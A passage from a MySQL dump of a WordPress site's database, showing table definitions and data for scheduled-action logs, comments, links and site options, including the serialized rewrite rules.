) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_actionscheduler_groups`
--

LOCK TABLES `wpii_actionscheduler_groups` WRITE;
/*!40000 ALTER TABLE `wpii_actionscheduler_groups` DISABLE KEYS */;
INSERT INTO `wpii_actionscheduler_groups` VALUES (1,'action-scheduler-migration'),(2,'wpforms');
/*!40000 ALTER TABLE `wpii_actionscheduler_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_actionscheduler_logs`
--

DROP TABLE IF EXISTS `wpii_actionscheduler_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_actionscheduler_logs` (
  `log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `action_id` bigint(20) unsigned NOT NULL,
  `message` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `log_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `log_date_local` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`log_id`),
  KEY `action_id` (`action_id`),
  KEY `log_date_gmt` (`log_date_gmt`)
) ENGINE=MyISAM AUTO_INCREMENT=478 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_actionscheduler_logs`
--

LOCK TABLES `wpii_actionscheduler_logs` WRITE;
/*!40000 ALTER TABLE `wpii_actionscheduler_logs` DISABLE KEYS */;
INSERT INTO `wpii_actionscheduler_logs` VALUES (387,136,'action created','2021-03-26 10:59:38','2021-03-26 10:59:38'),(394,130,'action started via WP Cron','2021-03-28 18:59:03','2021-03-28 18:59:03'),(395,130,'action complete via WP Cron','2021-03-28 18:59:03','2021-03-28 18:59:03'),(429,150,'action created','2021-04-05 14:56:34','2021-04-05 14:56:34'),(435,152,'action created','2021-04-07 15:04:18','2021-04-07 15:04:18'),(432,151,'action created','2021-04-06 15:04:16','2021-04-06 15:04:16'),(431,150,'action complete via WP Cron','2021-04-06 15:04:16','2021-04-06 15:04:16'),(434,151,'action complete via WP Cron','2021-04-07 15:04:18','2021-04-07 15:04:18'),(433,151,'action started via WP Cron','2021-04-07 15:04:18','2021-04-07 15:04:18'),(438,153,'action created','2021-04-08 15:42:11','2021-04-08 15:42:11'),(456,159,'action created','2021-04-12 16:36:05','2021-04-12 16:36:05'),(375,132,'action created','2021-03-22 09:53:32','2021-03-22 09:53:32'),(402,141,'action created','2021-03-29 11:53:10','2021-03-29 11:53:10'),(436,152,'action started via WP Cron','2021-04-08 15:42:11','2021-04-08 15:42:11'),(430,150,'action started via WP Cron','2021-04-06 15:04:16','2021-04-06 15:04:16'),(437,152,'action complete via WP Cron','2021-04-08 15:42:11','2021-04-08 15:42:11'),(419,146,'action complete via WP Cron','2021-04-04 14:39:59','2021-04-04 14:39:59'),(441,154,'action created','2021-04-09 16:03:03','2021-04-09 16:03:03'),(452,149,'action complete via WP Cron','2021-04-12 04:48:45','2021-04-12 04:48:45'),(453,158,'action created','2021-04-12 04:48:45','2021-04-12 04:48:45'),(381,134,'action created','2021-03-24 10:30:19','2021-03-24 10:30:19'),(379,133,'action started via WP Cron','2021-03-24 10:30:19','2021-03-24 10:30:19'),(378,133,'action created','2021-03-23 10:05:17','2021-03-23 10:05:17'),(380,133,'action complete via WP Cron','2021-03-24 10:30:19','2021-03-24 10:30:19'),(368,121,'action complete via WP Cron','2021-03-21 18:46:31','2021-03-21 18:46:31'),(367,121,'action started via WP Cron','2021-03-21 18:46:31','2021-03-21 18:46:31'),(377,132,'action complete via WP Cron','2021-03-23 10:05:17','2021-03-23 10:05:17'),(376,132,'action started via WP Cron','2021-03-23 10:05:17','2021-03-23 10:05:17'),(401,138,'action complete via WP Cron','2021-03-29 11:53:10','2021-03-29 11:53:10'),(371,122,'action complete via WP Cron','2021-03-22 04:22:50','2021-03-22 04:22:50'),(370,122,'action started via WP Cron','2021-03-22 04:22:50','2021-03-22 04:22:50'),(365,128,'action complete via WP Cron','2021-03-21 09:43:18','2021-03-21 09:43:18'),(364,128,'action started via WP Cron','2021-03-21 09:43:18','2021-03-21 09:43:18'),(362,127,'action complete via WP Cron','2021-03-20 08:42:21','2021-03-20 08:42:21'),(361,127,'action started via WP Cron','2021-03-20 08:42:21','2021-03-20 08:42:21'),(359,126,'action complete via WP Cron','2021-03-19 08:03:10','2021-03-19 08:03:10'),(360,127,'action created','2021-03-19 08:03:10','2021-03-19 08:03:10'),(384,135,'action created','2021-03-25 10:44:51','2021-03-25 10:44:51'),(475,157,'action started via WP Cron','2021-04-18 20:27:39','2021-04-18 20:27:39'),(357,126,'action created','2021-03-18 06:29:23','2021-03-18 06:29:23'),(472,164,'action started via WP Cron','2021-04-18 18:50:59','2021-04-18 18:50:59'),(358,126,'action started via WP Cron','2021-03-19 08:03:10','2021-03-19 08:03:10'),(363,128,'action created','2021-03-20 08:42:21','2021-03-20 08:42:21'),(366,129,'action created','2021-03-21 09:43:18','2021-03-21 09:43:18'),(400,138,'action started via WP Cron','2021-03-29 11:53:10','2021-03-29 11:53:10'),(396,139,'action created','2021-03-28 18:59:03','2021-03-28 18:59:03'),(372,131,'action created','2021-03-22 04:22:50','2021-03-22 04:22:50'),(465,162,'action created','2021-04-15 17:50:28','2021-04-15 17:50:28'),(468,163,'action created','2021-04-16 18:02:43','2021-04-16 18:02:43'),(342,121,'action created','2021-03-14 17:43:36','2021-03-14 17:43:36'),(470,163,'action complete via WP Cron','2021-04-17 18:07:10','2021-04-17 18:07:10'),(471,164,'action created','2021-04-17 18:07:10','2021-04-17 18:07:10'),(428,147,'action complete via WP Cron','2021-04-05 14:56:34','2021-04-05 14:56:34'),(424,140,'action started via WP Cron','2021-04-05 04:44:52','2021-04-05 04:44:52'),(425,140,'action complete via WP Cron','2021-04-05 04:44:53','2021-04-05 04:44:53'),(426,149,'action created','2021-04-05 04:44:53','2021-04-05 04:44:53'),(427,147,'action started via WP Cron','2021-04-05 14:56:34','2021-04-05 14:56:34'),(467,162,'action complete via WP Cron','2021-04-16 18:02:43','2021-04-16 18:02:43'),(477,166,'action created','2021-04-18 20:27:40','2021-04-18 20:27:40'),(345,122,'action created','2021-03-15 04:21:47','2021-03-15 04:21:47'),(476,157,'action complete via WP Cron','2021-04-18 20:27:40','2021-04-18 20:27:40'),(462,161,'action created','2021-04-14 17:33:58','2021-04-14 17:33:58'),(461,160,'action complete via WP Cron','2021-04-14 17:33:58','2021-04-14 17:33:58'),(463,161,'action started via WP Cron','2021-04-15 17:50:28','2021-04-15 17:50:28'),(464,161,'action complete via WP Cron','2021-04-15 17:50:28','2021-04-15 17:50:28'),(369,130,'action created','2021-03-21 18:46:31','2021-03-21 18:46:31'),(469,163,'action started via WP Cron','2021-04-17 18:07:10','2021-04-17 18:07:10'),(460,160,'action started via WP Cron','2021-04-14 17:33:58','2021-04-14 17:33:58'),(466,162,'action started via WP Cron','2021-04-16 18:02:43','2021-04-16 18:02:43'),(459,160,'action created','2021-04-13 17:23:14','2021-04-13 17:23:14'),(474,165,'action created','2021-04-18 18:50:59','2021-04-18 18:50:59'),(455,156,'action complete via WP Cron','2021-04-12 16:36:05','2021-04-12 16:36:05'),(454,156,'action started via WP Cron','2021-04-12 16:36:05','2021-04-12 16:36:05'),(458,159,'action complete via WP Cron','2021-04-13 17:23:14','2021-04-13 17:23:14'),(457,159,'action started via WP Cron','2021-04-13 17:23:14','2021-04-13 17:23:14'),(473,164,'action complete via WP Cron','2021-04-18 18:50:59','2021-04-18 18:50:59'),(450,157,'action created','2021-04-11 20:01:28','2021-04-11 20:01:28'),(449,148,'action complete via WP Cron','2021-04-11 20:01:28','2021-04-11 20:01:28'),(373,129,'action started via WP Cron','2021-03-22 09:53:32','2021-03-22 09:53:32'),(374,129,'action complete via WP Cron','2021-03-22 09:53:32','2021-03-22 09:53:32'),(445,155,'action started via WP Cron','2021-04-11 16:19:15','2021-04-11 16:19:15'),(446,155,'action complete via WP Cron','2021-04-11 16:19:15','2021-04-11 16:19:15'),(447,156,'action created','2021-04-11 16:19:15','2021-04-11 16:19:15'),(448,148,'action started via WP Cron','2021-04-11 20:01:28','2021-04-11 20:01:28'),(442,154,'action started via WP Cron','2021-04-10 16:05:31','2021-04-10 16:05:31'),(443,154,'action complete via WP Cron','2021-04-10 16:05:31','2021-04-10 16:05:31'),(444,155,'action created','2021-04-10 16:05:31','2021-04-10 16:05:31'),(440,153,'action complete via WP Cron','2021-04-09 16:03:03','2021-04-09 16:03:03'),(439,153,'action started via WP Cron','2021-04-09 16:03:03','2021-04-09 16:03:03'),(451,149,'action started via WP Cron','2021-04-12 04:48:45','2021-04-12 04:48:45'),(383,134,'action complete via WP Cron','2021-03-25 10:44:51','2021-03-25 10:44:51'),(382,134,'action started via WP Cron','2021-03-25 10:44:51','2021-03-25 10:44:51'),(423,148,'action created','2021-04-04 19:27:22','2021-04-04 19:27:22'),(386,135,'action complete via WP Cron','2021-03-26 10:59:38','2021-03-26 10:59:38'),(385,135,'action started via WP Cron','2021-03-26 10:59:38','2021-03-26 10:59:38'),(390,137,'action created','2021-03-27 11:39:36','2021-03-27 11:39:36'),(389,136,'action complete via WP Cron','2021-03-27 11:39:36','2021-03-27 11:39:36'),(388,136,'action started via WP Cron','2021-03-27 11:39:36','2021-03-27 11:39:36'),(393,138,'action created','2021-03-28 11:47:16','2021-03-28 11:47:16'),(392,137,'action complete via WP Cron','2021-03-28 11:47:16','2021-03-28 11:47:16'),(391,137,'action started via WP Cron','2021-03-28 11:47:16','2021-03-28 11:47:16'),(399,140,'action created','2021-03-29 04:37:07','2021-03-29 04:37:07'),(398,131,'action complete via WP Cron','2021-03-29 04:37:07','2021-03-29 04:37:07'),(397,131,'action started via WP Cron','2021-03-29 04:37:07','2021-03-29 04:37:07'),(405,142,'action created','2021-03-30 13:24:09','2021-03-30 13:24:09'),(404,141,'action complete via WP Cron','2021-03-30 13:24:09','2021-03-30 13:24:09'),(403,141,'action started via WP Cron','2021-03-30 13:24:09','2021-03-30 13:24:09'),(408,143,'action created','2021-03-31 13:36:41','2021-03-31 13:36:41'),(407,142,'action complete via WP Cron','2021-03-31 13:36:41','2021-03-31 13:36:41'),(406,142,'action started via WP Cron','2021-03-31 13:36:41','2021-03-31 13:36:41'),(411,144,'action created','2021-04-01 13:41:11','2021-04-01 13:41:11'),(420,147,'action created','2021-04-04 14:39:59','2021-04-04 14:39:59'),(421,139,'action started via WP Cron','2021-04-04 19:27:22','2021-04-04 19:27:22'),(422,139,'action complete via WP Cron','2021-04-04 19:27:22','2021-04-04 19:27:22'),(410,143,'action complete via WP Cron','2021-04-01 13:41:11','2021-04-01 13:41:11'),(409,143,'action started via WP Cron','2021-04-01 13:41:11','2021-04-01 13:41:11'),(414,145,'action created','2021-04-02 14:26:50','2021-04-02 14:26:50'),(413,144,'action complete via WP Cron','2021-04-02 14:26:50','2021-04-02 14:26:50'),(412,144,'action started via WP Cron','2021-04-02 14:26:50','2021-04-02 14:26:50'),(417,146,'action created','2021-04-03 14:36:12','2021-04-03 14:36:12'),(416,145,'action complete via WP Cron','2021-04-03 14:36:12','2021-04-03 14:36:12'),(415,145,'action started via WP Cron','2021-04-03 14:36:12','2021-04-03 14:36:12'),(418,146,'action started via WP Cron','2021-04-04 14:39:59','2021-04-04 14:39:59');
/*!40000 ALTER TABLE `wpii_actionscheduler_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_commentmeta`
--

DROP TABLE IF EXISTS `wpii_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_commentmeta`
--

LOCK TABLES `wpii_commentmeta` WRITE;
/*!40000 ALTER TABLE `wpii_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpii_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_comments`
--

DROP TABLE IF EXISTS `wpii_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_author_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_comments`
--

LOCK TABLES `wpii_comments` WRITE;
/*!40000 ALTER TABLE `wpii_comments` DISABLE KEYS */;
INSERT INTO `wpii_comments` VALUES (1,1,'A WordPress Commenter','wapuu@wordpress.example','https://wordpress.org/','','2020-10-28 12:21:43','2020-10-28 12:21:43','Hi, this is a comment.\nTo get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.\nCommenter avatars come from <a href=\"https://gravatar.com\">Gravatar</a>.',0,'1','','comment',0,0);
/*!40000 ALTER TABLE `wpii_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_links`
--

DROP TABLE IF EXISTS `wpii_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_image` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_target` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_visible` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_notes` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `link_rss` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_links`
--

LOCK TABLES `wpii_links` WRITE;
/*!40000 ALTER TABLE `wpii_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpii_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_options`
--

DROP TABLE IF EXISTS `wpii_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `option_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `autoload` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=MyISAM AUTO_INCREMENT=15456 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_options`
--

LOCK TABLES `wpii_options` WRITE;
/*!40000 ALTER TABLE `wpii_options` DISABLE KEYS */;
INSERT INTO `wpii_options` VALUES (1,'siteurl','http://highperformingstudent.com','yes'),(2,'home','http://highperformingstudent.com','yes'),(3,'blogname','','yes'),(4,'blogdescription','','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','sam@samdemma.com','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%year%/%monthnum%/%day%/%postname%/','yes'),(29,'rewrite_rules','a:197:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:38:\"templatera/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:48:\"templatera/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:68:\"templatera/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"templatera/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"templatera/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:44:\"templatera/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:27:\"templatera/([^/]+)/embed/?$\";s:43:\"index.php?templatera=$matches[1]&embed=true\";s:31:\"templatera/([^/]+)/trackback/?$\";s:37:\"index.php?templatera=$matches[1]&tb=1\";s:39:\"templatera/([^/]+)/page/?([0-9]{1,})/?$\";s:50:\"index.php?templatera=$matches[1]&paged=$matches[2]\";s:46:\"templatera/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?templatera=$matches[1]&cpage=$matches[2]\";s:35:\"templatera/([^/]+)(?:/([0-9]+))?/?$\";s:49:\"index.php?templatera=$matches[1]&page=$matches[2]\";s:27:\"templatera/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"templatera/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"templatera/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"templatera/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"templatera/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"templatera/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:40:\"vc_grid_item/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:50:\"vc_grid_item/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:70:\"vc_grid_item/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"vc_grid_item/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"vc_grid_item/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:46:\"vc_grid_item/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:29:\"vc_grid_item/([^/]+)/embed/?$\";s:45:\"index.php?vc_grid_item=$matches[1]&embed=true\";s:33:\"vc_grid_item/([^/]+)/trackback/?$\";s:39:\"index.php?vc_grid_item=$matches[1]&tb=1\";s:41:\"vc_grid_item/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?vc_grid_item=$matches[1]&paged=$matches[2]\";s:48:\"vc_grid_item/([^/]+)/comment-page-([0-9]{1,})/?$\";s:52:\"index.php?vc_grid_item=$matches[1]&cpage=$matches[2]\";s:37:\"vc_grid_item/([^/]+)(?:/([0-9]+))?/?$\";s:51:\"index.php?vc_grid_item=$matches[1]&page=$matches[2]\";s:29:\"vc_grid_item/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:39:\"vc_grid_item/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:59:\"vc_grid_item/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"vc_grid_item/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"vc_grid_item/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:35:\"vc_grid_item/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:35:\"portfolio/.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:45:\"portfolio/.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:65:\"portfolio/.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"portfolio/.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"portfolio/.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:41:\"portfolio/.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:24:\"portfolio/(.+?)/embed/?$\";s:42:\"index.php?portfolio=$matches[1]&embed=true\";s:28:\"portfolio/(.+?)/trackback/?$\";s:36:\"index.php?portfolio=$matches[1]&tb=1\";s:36:\"portfolio/(.+?)/page/?([0-9]{1,})/?$\";s:49:\"index.php?portfolio=$matches[1]&paged=$matches[2]\";s:43:\"portfolio/(.+?)/comment-page-([0-9]{1,})/?$\";s:49:\"index.php?portfolio=$matches[1]&cpage=$matches[2]\";s:32:\"portfolio/(.+?)(?:/([0-9]+))?/?$\";s:48:\"index.php?portfolio=$matches[1]&page=$matches[2]\";s:53:\"project-type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?project-type=$matches[1]&feed=$matches[2]\";s:48:\"project-type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?project-type=$matches[1]&feed=$matches[2]\";s:29:\"project-type/([^/]+)/embed/?$\";s:45:\"index.php?project-type=$matches[1]&embed=true\";s:41:\"project-type/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?project-type=$matches[1]&paged=$matches[2]\";s:23:\"project-type/([^/]+)/?$\";s:34:\"index.php?project-type=$matches[1]\";s:34:\"services/.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:44:\"services/.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:64:\"services/.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"services/.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"services/.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:40:\"services/.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:23:\"services/(.+?)/embed/?$\";s:41:\"index.php?services=$matches[1]&embed=true\";s:27:\"services/(.+?)/trackback/?$\";s:35:\"index.php?services=$matches[1]&tb=1\";s:35:\"services/(.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?services=$matches[1]&paged=$matches[2]\";s:42:\"services/(.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?services=$matches[1]&cpage=$matches[2]\";s:31:\"services/(.+?)(?:/([0-9]+))?/?$\";s:47:\"